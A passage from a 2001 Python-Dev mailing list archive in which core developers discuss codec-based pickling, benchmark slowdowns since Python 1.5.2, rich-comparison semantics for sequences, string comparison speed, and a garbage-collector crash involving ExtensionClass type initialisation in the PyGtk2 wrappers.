do ;-) I wasn't referring to the use of pickle and marshal with string.encode() and .decode(); even though you could then decode a pickle using "pickledata".decode("pickle") and get back the object. These two are very useful though when it comes to using codecs for file wrappers: f = codecs.open('mypicklfile', mode='wb', encoding='pickle') f.write((123, 'abc', 456.789)) f.close() f = codecs.open('mypicklfile', mode='rb', encoding='pickle') t = f.read() f.close() > hypergeneralization, of course. > > more candidates: > > "10".decode("int") > "10.0".decode("float") > "[1, 2, 3]".decode("list") > "readme.txt".decode("file") > "SyntaxError".decode("raise") > (etc) You forgot the most important one ;-) ... "print 'My first Python program'".decode("python").run() -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip at pobox.com Wed May 16 19:44:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 12:44:15 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> <3B02A9D9.113836D6@lemburg.com> Message-ID: <15106.48239.813965.579600@beluga.mojam.com> mal> Still their basic task is to take an object and encode in some way mal> for dumps() and do the reverse for loads(). That's pretty much mal> what codecs normally do ;-) Yes, I see that. The conceptual problem I have is that in all previous examples I've seen here they have taken as input and returned as outputs only strings or unicode objects. mal> These two are very useful though when it comes to using codecs mal> for file wrappers: This use I missed. Thanks for the explanation. Skip From mal at lemburg.com Wed May 16 20:33:44 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 20:33:44 +0200 Subject: [Python-Dev] Performance compares Message-ID: <3B02C808.E3354D3F@lemburg.com> After having read a little into the comparison thread, I tried some performance compares on my own: the one between the current CVS version and Python 1.5.2. Both versions were compiled on the same Linux machine, using the same GCC compiler and optimization settings. Here are the results from pybench 0.9 and pystone; some of the figures show quite dramatic slow-downs. I'm not sure where they result from, but they do concern me a bit, since the upgrade path from 1.5.2 is probably the most common one to be expected in user-land. Since it is possible that these figures result from my specific machine setup, I'd like to know what other people see on their machines. Thanks. -- Python 1.5.2: Pystone(1.1) time for 10000 passes = 3.26 This machine benchmarks at 3067.48 pystones/second Python CVS: Pystone(1.1) time for 10000 passes = 4.43 This machine benchmarks at 2257.34 pystones/second -- PYBENCH 0.9 Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20) Tests: per run per oper. diff *) ------------------------------------------------------------------------ BuiltinFunctionCalls: 1152.60 ms 9.04 us +64.70% BuiltinMethodLookup: 903.90 ms 1.72 us CompareFloats: 908.30 ms 2.02 us +40.94% CompareFloatsIntegers: 1276.25 ms 2.84 us +37.15% CompareIntegers: 1075.50 ms 1.19 us +21.09% CompareLongs: 989.40 ms 2.20 us +47.12% CompareStrings: 844.80 ms 2.25 us +33.99% CompareUnicode: 1018.65 ms 2.72 us n/a ConcatStrings: 1226.30 ms 8.18 us +92.56% ConcatUnicode: 1575.40 ms 10.50 us n/a CreateInstances: 2094.05 ms 49.86 us +101.86% CreateStringsWithConcat: 1515.75 ms 7.58 us +111.67% CreateUnicodeWithConcat: 1833.85 ms 9.17 us n/a DictCreation: 2795.30 ms 18.64 us +203.34% DictWithFloatKeys: 2285.70 ms 3.81 us +18.73% DictWithIntegerKeys: 1444.65 ms 2.41 us +58.53% DictWithStringKeys: 1262.60 ms 2.10 us +52.83% ForLoops: 989.95 ms 99.00 us -10.01% IfThenElse: 1232.45 ms 1.83 us +23.25% ListSlicing: 621.40 ms 177.54 us NestedForLoops: 986.60 ms 2.82 us +52.09% NormalClassAttribute: 1231.15 ms 2.05 us +36.70% NormalInstanceAttribute: 1114.15 ms 1.86 us +27.11% PythonFunctionCalls: 1251.25 ms 7.58 us +46.09% PythonMethodCalls: 1034.35 ms 13.79 us +42.19% Recursion: 922.15 ms 73.77 us +36.76% SecondImport: 1055.45 ms 42.22 us +100.47% SecondPackageImport: 1061.35 ms 42.45 us +96.31% SecondSubmoduleImport: 1292.35 ms 51.69 us +77.89% SimpleComplexArithmetic: 1748.00 ms 7.95 us +120.97% SimpleDictManipulation: 1172.85 ms 3.91 us +47.85% SimpleFloatArithmetic: 881.25 ms 1.60 us +12.30% SimpleIntFloatArithmetic: 833.80 ms 1.26 us SimpleIntegerArithmetic: 839.00 ms 1.27 us SimpleListManipulation: 1252.60 ms 4.64 us +69.37% SimpleLongArithmetic: 1360.65 ms 8.25 us +100.43% SmallLists: 2380.05 ms 9.33 us +116.72% SmallTuples: 1793.80 ms 7.47 us +101.52% SpecialClassAttribute: 1257.35 ms 2.10 us +37.91% SpecialInstanceAttribute: 1340.25 ms 2.23 us +21.13% StringMappings: 1601.50 ms 12.71 us n/a StringPredicates: 1059.70 ms 3.78 us n/a StringSlicing: 1235.90 ms 7.06 us +98.32% TryExcept: 1272.55 ms 0.85 us +28.39% TryRaiseExcept: 1383.45 ms 92.23 us +77.48% TupleSlicing: 1163.05 ms 11.08 us +75.29% UnicodeMappings: 1232.80 ms 68.49 us n/a UnicodePredicates: 1294.95 ms 5.76 us n/a UnicodeProperties: 1410.45 ms 7.05 us n/a UnicodeSlicing: 1296.80 ms 7.41 us n/a ------------------------------------------------------------------------ Average round time: 73388.00 ms n/a *) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20) (The compares not shown are below noise level (+-10%)) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Wed May 16 21:07:49 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 15:07:49 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > The question remaining is how much of this list/tuple richcmp behavior is > guaranteed by the language and how much is just implementation-dependent > fuzz. [Guido] > Unclear what you're asking. The language doesn't require any > particular semantics for sequence comparisons, but the language of > course includes the tuple and list squence types, and it describes > (albeing lacking some rigorous detail) what comparisons for those do. The current Tuples and lists are compared lexicographically using comparison of corresponding items. was quite clear in a cmp-only world. In a richcmp world, "compared lexicographically" is fuzzy enough that different implementations may do different things in good faith, competent users may disagree about what it means in specific cases, and programs may yield different results across implementations (or random CVS patches ). > If there are specific lacks of detail, it probably helps to think > about filling those in. The *level* of additional detail intended is the cutoff between what's guaranteed by the language and what's left up to the implementation. The full truth before was relatively simple. For a pair x, y of lists or tuples, def __cmp__(x, y): # pretending this is a method on lists and tuples i = 0 while i < len(x) and i < len(y): c = cmp(x[i], y[i]) if c: return c i += 1 return cmp(len(x), len(y)) was *almost* the entire tale, incl. that lengths were re-fetched on each iteration. What's left unexplained is the treatment of recursive lists, and so the result of comparing them is a prime suspect for different behavior across implementations and releases. In a richcmp world, there are several additional ways in which the above fails to capture the full truth, and each of those ways is another prime suspect for surprises. For example, I believe it's *intended* that: 1. Element comparisons continue to be strictly left-to-right, and that no element comparisons are to be performed after the leftmost element comparison that settles the issue (if any). 2. tuple/list comparison via == or != must use only == comparison on elements, and that implementations are allowed (but not required) to skip all element comparisons when == or != comparison is given lists/tuples of different sizes. OTOH, I doubt (but don't know) it's intended that all implementations must emulate other semantically significant details of the current implementation, like: 1. <=, <, > and >= comparisons will do at most one element comparison that is not an == comparison. 2. Whenever a <, <=, > or >= element comparison is needed, the long- winded details of how that works, incl. but not limited to the specific "first try ==, then try <, then try >" strategy used to simulate a pre-richcmp cmp() when all else fails. Going back to the original example: >>> class C: ... def __lt__(x, y): return 1 ... __eq__ = __lt__ ... >>> a, b = C(), C() >>> a < b #1 1 >>> [a] < [b] #2 0 >>> cmp(a, b) #3 0 >>> a > b #4 1 >>> a == b #5 1 >>> a != b #6 1 >>> Which of those results are *required* by the language, and which merely *allowed*? + I believe #1, #4 and #5 are required. + I have no idea whether to call it "a bug" if the #2 and/or #3 and/or #6 results differed, e.g., under Jython, or under CPython 2.3. Indeed, I'm not even sure why #6 returns 1 under CPython today, and I've been staring at this a lot lately ... OK, #6 ends up getting resolved by comparing object addresses, which leaves "required or not?" fuzzy (i.e., *must* it be resolved that way? or is it implementation-defined?). From guido at digicool.com Wed May 16 22:35:46 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 15:35:46 -0500 Subject: [Python-Dev] Rich comparison of lists and tuples In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400." References: Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> [Subject fixed] [Tim shows there's a lot left to the imagination when trying to glean the meaning of list1==list2 using rich comparisons.] I would like to break this down by defining the mapping between cmp() and rich comparisons. I propose: - If cmp() is requested but not defined, and rich comparisons are defined, try ==, <, > in order; if all three yield false, act as if rich comparisons were not defined, and use the fallback comparison (i.e. by address). - If a rich comparison is requested but not defined, use cmp() and use the obvious mapping. - Continue to define the comparison of unequal sequences in terms of cmp(). - Testing == or != for sequences takes these shortcuts: 1. if the lengths differ, the sequences differ 2. compare the elements using == until a false return is found Note that this defines 'x!=y' as 'not x==y' for sequences. We could easily go the extra mile and define != to use only != on the items; but is this worth the extra complexity? --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Wed May 16 22:37:43 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 15:37:43 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <20010516091942.A16455@glacier.fnational.com> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> <20010516091942.A16455@glacier.fnational.com> Message-ID: <15106.58647.495143.164636@beluga.mojam.com> Neil> In other words the GC is finding a tuple object that contains an Neil> element with a funny looking address (data segment?) and an Neil> op_type of NULL. Neil, I'm not sure if the funny looking address is a red herring or the key to the crime. I tried running with a breakpoint set in getBaseDictionary. The first couple times, the type parameter looked like $26 = (PyExtensionClass *) 0x80e7f60 $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7138 "ExtensionClass", ...} $28 = (PyExtensionClass *) 0x80e8060 $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7209 "Base", ...} The third time it looked like $30 = (PyExtensionClass *) 0x4019f120 $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x4019dab2 "GObject", ...} The difference between the first two calls and the third one is that the first two objects are defined in ExtensionClass.o, which I currently statically link into the interpreter. The Gtk/GObject stuff is dynamically loaded into the running executable, so it's not surprising that it winds up at a wildly different address than the ExtensionClass stuff. My current best guess is that whatever object the tuple is referring to is declared static in the dynamically loaded Gtk stuff and has no business getting reclaimed by the collector. Sounds like a missing Py_INCREF somewhere. At the earliest point I've been able to check that object so far, its ob_type field is NULL. Skip From cpr at emsoftware.com Thu May 17 00:24:15 2001 From: cpr at emsoftware.com (Chris Ryland) Date: Wed, 16 May 2001 18:24:15 -0400 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2> This talk is most entertaining! Highly recommended to you good folk, if only as a reinforcement of the good design principles embodied in Python (with the exception of print >> ;-). Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he wanted to give an example of a modern dynamic language (disclaiming a lot of knowledge about it). He mentioned it three or four times (usually positively), so it must be on the tip of his mind. -- Cheers! Chris Ryland Em Software, Inc. www.emsoftware.com From greg at cosc.canterbury.ac.nz Thu May 17 03:49:31 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 17 May 2001 13:49:31 +1200 (NZST) Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > You forgot the most important one ;-) ... > > "print 'My first Python program'".decode("python").run() Surely that should be: "'My first Python program'.encode('stdout')".decode("python").decode("run") Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Thu May 17 03:56:56 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 21:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > I'll put a patch on SF soon which does what you want to do, i.e. tries > tp_compare as the first thing if tp_richcompare is not there. Thanks! I'll check it out. > Even with this patch, your code is faster if strings have a > richcompare. OK, from what I understand, that makes no sense. Does it to you? Assuming you're still talking about my silly little "ab" < "cd" test, then all the new code you put into your richcompare slot was a waste of cycles for that specific case: the new richcmp "objects the same type?" test would fail, then the new "pointers equal?" test would fail, then the new "op == Py_EQ?" test would fail, and then richcompare would give up and call string_compare() anyway. So I'm either missing something fundamental about what you did, or it's a timing anomaly on your box that defies obvious explanation ("but if I add three new tests that don't pay off, and make an extra call, then it's faster!"). > Without richcompare, I get > > 0.720 > 0.720 > 0.720 > 0.730 > 0.720 > 0.720 > 0.730 > 0.720 > 0.720 > 0.730 > > With it, I get > > 0.710 > 0.720 > 0.720 > 0.710 > 0.710 > 0.720 > 0.710 > 0.710 > 0.710 > 0.720 See above. > Given that stock CVS python is in the 0.78 range, the different is > neglectable, though. Oh, I don't like giving up that easy on things that make no sense -- something else is happening here, although I've no idea what. From tim.one at home.com Thu May 17 04:17:37 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 22:17:37 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> Message-ID: [MAL] > Since it is possible that these figures result from my specific > machine setup, I'd like to know what other people see on their > machines. Is this the same machine where you were able to get 15% difference a few years ago by adding or removing an unreachable printf in ceval.c (or was that Vladimir)? If so, I bet it's degenerated to random 50% difference since then . My Win98SE box is *astonishingly* useless for timings. Without fail, the first time I run pystone after a reboot yields a result a solid 50% higher than the second or subsequent times I run it (yes, it's major-league *slower* the second time). This is true across dozens of trials over several months, and across all versions of Python. And simple little loops routinely vary in reported runtime by a factor of 3. I may have to dig my old Win95 box out of the packing crate <0.6 wink>. None of that changes, of course, that the numbers you got are scary. From jeremy at digicool.com Thu May 17 00:37:47 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 16 May 2001 18:37:47 -0400 (EDT) Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> References: <3B02C808.E3354D3F@lemburg.com> Message-ID: <15107.315.19349.268345@slothrop.digicool.com> As usual, the results you're reporting are quite different than what I see on my machine. I'd like to think that my machine is more normal than yours, but I expect we're both oddballs <0.2 wink>. I see basically the same slowdowns that you see, but the amount of the slowdown is quite a bit smaller. I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and the -O3 flag; ran pybench of an 800MHz P3 with 256MB RAM running Linux 2.2.17. Python 1.5.2: Pystone(1.1) time for 10000 passes = 0.85 This machine benchmarks at 11764.7 pystones/second Python CVS: Pystone(1.1) time for 10000 passes = 0.94 This machine benchmarks at 10638.3 pystones/second PYBENCH 0.9 Benchmark: cvs (rounds=10, warp=100) Tests: per run per oper. diff * ------------------------------------------------------------------------ BuiltinFunctionCalls: 41.85 ms 1.64 us +31.40% CompareFloats: 39.60 ms 0.44 us +13.96% CompareFloatsIntegers: CompareIntegers: CompareLongs: 39.85 ms 0.44 us +15.01% CompareStrings: CompareUnicode: ConcatStrings: 48.65 ms 1.62 us +46.76% ConcatUnicode: CreateInstances: 75.75 ms 9.02 us +55.54% CreateStringsWithConcat: 51.60 ms 1.29 us +62.78% CreateUnicodeWithConcat: DictCreation: 87.80 ms 2.93 us +115.72% DictWithFloatKeys: DictWithIntegerKeys: DictWithStringKeys: ForLoops: 63.85 ms 31.93 us -13.60% IfThenElse: ListSlicing: NestedForLoops: 32.95 ms 0.66 us +10.39% NormalClassAttribute: NormalInstanceAttribute: PythonFunctionCalls: 48.85 ms 1.48 us +11.78% PythonMethodCalls: 38.95 ms 2.60 us +12.09% Recursion: SecondImport: 37.80 ms 7.56 us +65.79% SecondPackageImport: 38.95 ms 7.79 us +50.68% SecondSubmoduleImport: 49.90 ms 9.98 us +35.05% SimpleComplexArithmetic: 58.95 ms 1.34 us +74.67% SimpleDictManipulation: SimpleFloatArithmetic: SimpleIntFloatArithmetic: SimpleIntegerArithmetic: SimpleListManipulation: 43.65 ms 0.81 us +15.63% SimpleLongArithmetic: 42.70 ms 1.29 us +53.32% SmallLists: 79.15 ms 1.55 us +56.89% SmallTuples: 66.65 ms 1.39 us +43.03% SpecialClassAttribute: SpecialInstanceAttribute: StringMappings: StringPredicates: StringSlicing: 39.00 ms 1.11 us +28.71% TryExcept: TryRaiseExcept: 50.60 ms 16.87 us +27.46% TupleSlicing: 37.90 ms 1.80 us +26.54% UnicodeMappings: UnicodePredicates: UnicodeProperties: UnicodeSlicing: ------------------------------------------------------------------------ Average round time: 3177.00 ms n/a *) measured against: 1.5.2 (rounds=10, warp=100) (As MAL did, I removed all the results were the difference is +/- 10%.) i-never-do-simple-complex-arithmetic-anyway-ly yr's, Jeremy From martin at loewis.home.cs.tu-berlin.de Thu May 17 08:12:18 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:12:18 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> > OK, from what I understand, that makes no sense. Does it to you? After reviewing everything again, I think I now do: In the richcomp case, I have res = (*f1)(v, w, op); if (res != Py_NotImplemented) return res; f1 is string_richcompare, so I get 2 function calls inside do_richcmp: one to string_richcompare, the other one to string_compare, as my optimizations are not triggered in your example. If I set tp_richcompare of strings to 0, I get past this code, and do c = (*f)(v, w); if (PyErr_Occurred()) return NULL; return convert_3way_to_object(op, c); Here, I get 3 function calls: f is string_compare, then PyErr_Occurred, finally convert_3way_to_object, which converts {-1,0,1} x Op -> {Py_True, Py_False}. Indeed, when I inline convert_3way_to_object, I get the same speed in both cases (with the remaining differences attributed to measurement and gcc doing register usage differently in both functions). I'd still be in favour of giving strings a richcompare, since it allows to optimize what I think is the single most frequent case: Py_EQ on strings. With a control flow like if (a->ob_size != b->ob_size) goto False; if (a->ob_size == 0) goto True; if (a->ob_sval[0] != b->ob_sval[0]) goto False; if(memcmp(a->ob_sval, b->ob_sval, a->ob_size)) goto False; else goto True; we can reduce the number of function calls Regards, Martin From skip at pobox.com Thu May 17 08:42:41 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 01:42:41 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround Message-ID: <15107.29409.242342.200378@beluga.mojam.com> Over the past couple days I've included python-dev on various messages in an ongoing thread about a segmentation violation I was getting with the new PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil Schemenauer, I finally know what's going on and I have a simple workaround that lets me get back to work. Here's a summary of the problem. When defining ExtensionClass types, you need to create and initialize a PyExtensionClass struct. It looks something like so: PyExtensionClass PyGtkTreeSortable_Type = { PyObject_HEAD_INIT(NULL) 0, /* ob_size */ "GtkTreeSortable", /* tp_name */ sizeof(PyPureMixinObject), /* tp_basicsize */ ... }; Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would normally be the address of a type object (e.g. &PyType_Type). However, Jim Fulton pointed out that on Windows you can't get the address of &PyType_Type object at compile time. Accordingly, ExtensionClass provides a PyExtensionClass_Export macro whose responsibility is, in part, to set the ob_type field appropriately at runtime. (I'm not sure why this Windows nit doesn't afflict other type declarations like PyTuple_Type. I'm sure others will know why. I just accept Jim's word as gospel and move on...) A problem arises if the garbage collector runs while the module initialization function is running, but before all the ob_type fields have been assigned their correct values. In this case, a one-element tuple representing the bases of a particular PyGtk extension class was traversed by the garbage collector. The workaround turns out to be exceedingly simple: import gc gc.disable() import gtk gc.enable() I can handle doing that from Python code for the time being and will leave it up to others to decide how, if at all, ExtensionClass should be changed to correct the problem. Skip From martin at loewis.home.cs.tu-berlin.de Thu May 17 08:41:15 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:41:15 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> > 1. String objects are also equal despite being different objects, > if their ob_sinterned pointers are equal and non-NULL. So if > you're looking for every trick in & out of the book, that's > another one. That does not help. In the entire test suite, there are 0 instances where strings are compared which are not identical, but have equal ob_sinterned pointers. > > So 5% of the calls are with identical strings, for which I can > > immediately decide the outcome. > > But also at the cost of doing a fruitless compare and branch in 95% > of calls. Whether there's a fruitless branch depends on your compiler. With gcc 3, you can write if (__builtin_expect(a == b, 0)) { and then the body of the if block will be moved out of the way of linear control flow. > Any idea where those 800,000 virgin calls to oldcomp are coming > from? That's a lot. As far as I could trace it, most of them come from lookdict_string (at various locations inside this function). > > #comps: 2949421 > > #memcmps: 917776 > > > > So still, ca. 30% can be decided by first byte. > > Sorry, I couldn't follow this part, except noting that 917776 is about 30% of > 2949421, in which case I would have expected you to say that 70% can be > decided by first byte. Oops, you are right. > It's clearer that this is going to hurt sorting (& bisect etc), by > adding yet another layer of function call to get Py_LT resolved (as > for dict compares too, the string richcmp can't do anything to speed > up Py_LT that string oldcmp can't do just as efficiently -- indeed, > that's the great advantage oldcmp's "compare first character" test > had: that *can* decide Py_LT in one byte much of the time (but > length comparison cannot)). So to support sorting better, I should special-case Py_LT in string_richcompare also, to avoid the function call ?-) > Note too earlier mail about how adding a richcmp slot to strings will > suddenly slow cmp(string1, string2) (which is the usual way to program a > search tree, because cmp() *used* to call a string comparison routine only > once; but after adding a richcmp slot, each cmp(string1, string2) will call > the richcmp slot from 1 thru 3 times (data-dependent)). Yes, that is a serious problem. Fortunately, very few calls in my programs go to string_compare through cmp() now. But then, your programs are different, of course... Regards, Martin From mal at lemburg.com Thu May 17 08:54:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 08:54:37 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B0375AD.24E039B0@lemburg.com> skip at pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. I wonder how the GC collector could "see" the type object before it has been initialized... since PyGtkTreeSortable_Type is a static C array and not a known PyObject until you add it to some Python dictionary as type object or use it for creating instances, it seems strange that the GC collector can reach out for it and get hit by the fact that it is not yet properly initialized. Some logic in PyExtensionClass_Export() or the GTK module must be twisted. > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Thu May 17 09:00:20 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Thu, 17 May 2001 09:00:20 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Skip wrote: > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime footnote: this is usually done in the module init function, *before* the call to Py_InitModule. see: http://www.python.org/doc/FAQ.html#3.24 if the garbage collector can run after Python calls a module's init- function, but before that module calls back into Python, anything can happen... Cheers /F From skip at pobox.com Thu May 17 09:04:06 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 02:04:06 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <3B0375AD.24E039B0@lemburg.com> References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> Message-ID: <15107.30694.131193.989215@beluga.mojam.com> mal> I wonder how the GC collector could "see" the type object before it mal> has been initialized... since PyGtkTreeSortable_Type is a static C mal> array and not a known PyObject until you add it to some Python mal> dictionary as type object or use it for creating instances, it mal> seems strange that the GC collector can reach out for it and get mal> hit by the fact that it is not yet properly initialized. It is actually PyGtkWidget_Type that is not yet initialized when it is placed in the bases tuple for one of its subclasses. GC traverses that tuple, then dives into each element. It hits the PyGtkWidget_Type object, whose ob_type field has not yet been initialized. The actual object whose bases tuple is being traversed is (in all the crashes I encountered), GdkDragContext. The ordering of the registration calls could perhaps be reordered. Currently GdkDragContext is patched up before GtkWidget, its base class. This code is generated by James Henstridge's wrapper code generator, so perhaps he can maintain the necessary class hierarchy relationships and insure that base classes are initialized before their subclasses. Skip From skip at pobox.com Thu May 17 09:07:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 02:07:15 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> References: <15107.29409.242342.200378@beluga.mojam.com> <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: <15107.30883.680397.280556@beluga.mojam.com> Fredrik> footnote: this is usually done in the module init function, Fredrik> *before* the call to Py_InitModule. see: Fredrik> http://www.python.org/doc/FAQ.html#3.24 Fredrik> if the garbage collector can run after Python calls a module's Fredrik> init- function, but before that module calls back into Python, Fredrik> anything can happen... Thanks for pointing that out. Py_InitModule is indeed called before the fixup occurs. Skip From mal at lemburg.com Thu May 17 09:09:38 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:09:38 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com> Message-ID: <3B037932.476F475A@lemburg.com> skip at pobox.com wrote: > > mal> I wonder how the GC collector could "see" the type object before it > mal> has been initialized... since PyGtkTreeSortable_Type is a static C > mal> array and not a known PyObject until you add it to some Python > mal> dictionary as type object or use it for creating instances, it > mal> seems strange that the GC collector can reach out for it and get > mal> hit by the fact that it is not yet properly initialized. > > It is actually PyGtkWidget_Type that is not yet initialized when it is > placed in the bases tuple for one of its subclasses. GC traverses that > tuple, then dives into each element. It hits the PyGtkWidget_Type object, > whose ob_type field has not yet been initialized. The actual object whose > bases tuple is being traversed is (in all the crashes I encountered), > GdkDragContext. The ordering of the registration calls could perhaps be > reordered. Currently GdkDragContext is patched up before GtkWidget, its > base class. This code is generated by James Henstridge's wrapper code > generator, so perhaps he can maintain the necessary class hierarchy > relationships and insure that base classes are initialized before their > subclasses. Wouldn't it be easier to simply set the ob_type fields right at the start of the initGtk() function ? This is what I do for all my extensions and I've never seen any problems with it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james at daa.com.au Thu May 17 09:18:23 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:18:23 +0800 (WST) Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: On Thu, 17 May 2001 skip at pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass 